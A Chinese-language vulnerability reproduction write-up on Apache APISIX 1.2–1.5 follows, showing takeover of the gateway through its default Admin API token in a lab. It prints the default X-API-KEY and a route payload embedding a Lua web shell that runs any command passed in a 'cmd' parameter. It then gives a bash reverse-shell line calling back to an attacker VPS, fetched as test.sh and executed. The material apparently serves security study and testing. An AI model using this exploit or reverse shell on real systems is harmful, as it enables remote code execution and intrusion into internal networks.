声明:本文仅供学习参考,其中涉及的一切资源均来源于网络,请勿用于任何非法行为,否则您将自行承担相应后果,本人不承担任何法律及连带责任。
漏洞描述
Apache APISIX 是一个动态、实时、高性能的 API 网关,基于 Nginx 网络库和 etcd 实现, 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API,没有配置相应的IP访问策略,且没有修改配置文件Token的情况下,则攻击者利用Apache APISIX的默认Token即可访问Apache APISIX,从而控制APISIX网关。
影响版本
Apache APISIX 1.2
Apache APISIX 1.3
Apache APISIX 1.4
Apache APISIX 1.5
漏洞复现
该漏洞环境搭建,依然通过vulhub,不再赘述。
访问一下http://192.168.10.171:9080/apisix/admin/routes,说明开启了/apisix/admin/routes
抓取该报文,做如下修改
1、请求方法改为POST
2、加上参数X-API-KEY: edd1c9f034335f136f87ad84b625c8f1
3、加上payload
{
"uri": "/attack",
"script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close() \n end \nreturn _M",
"upstream": {
"type": "roundrobin",
"nodes": {
"example.com:80": 1
}
}
}
然后,访问刚才添加的router,并通过cmd参数执行任意命令
接下来,我们来演示将内网的这台服务器,反向连接到VPS上
首先,VPS上编写反弹shell脚本 bash -i >& /dev/tcp/VPS_IP/VPS_PORT 0>&1,然后在使用python起一个http服务:python3 -m http.server
下载test.sh脚本文件
接下来,执行test.sh脚本文件
VPS上查看反弹结果
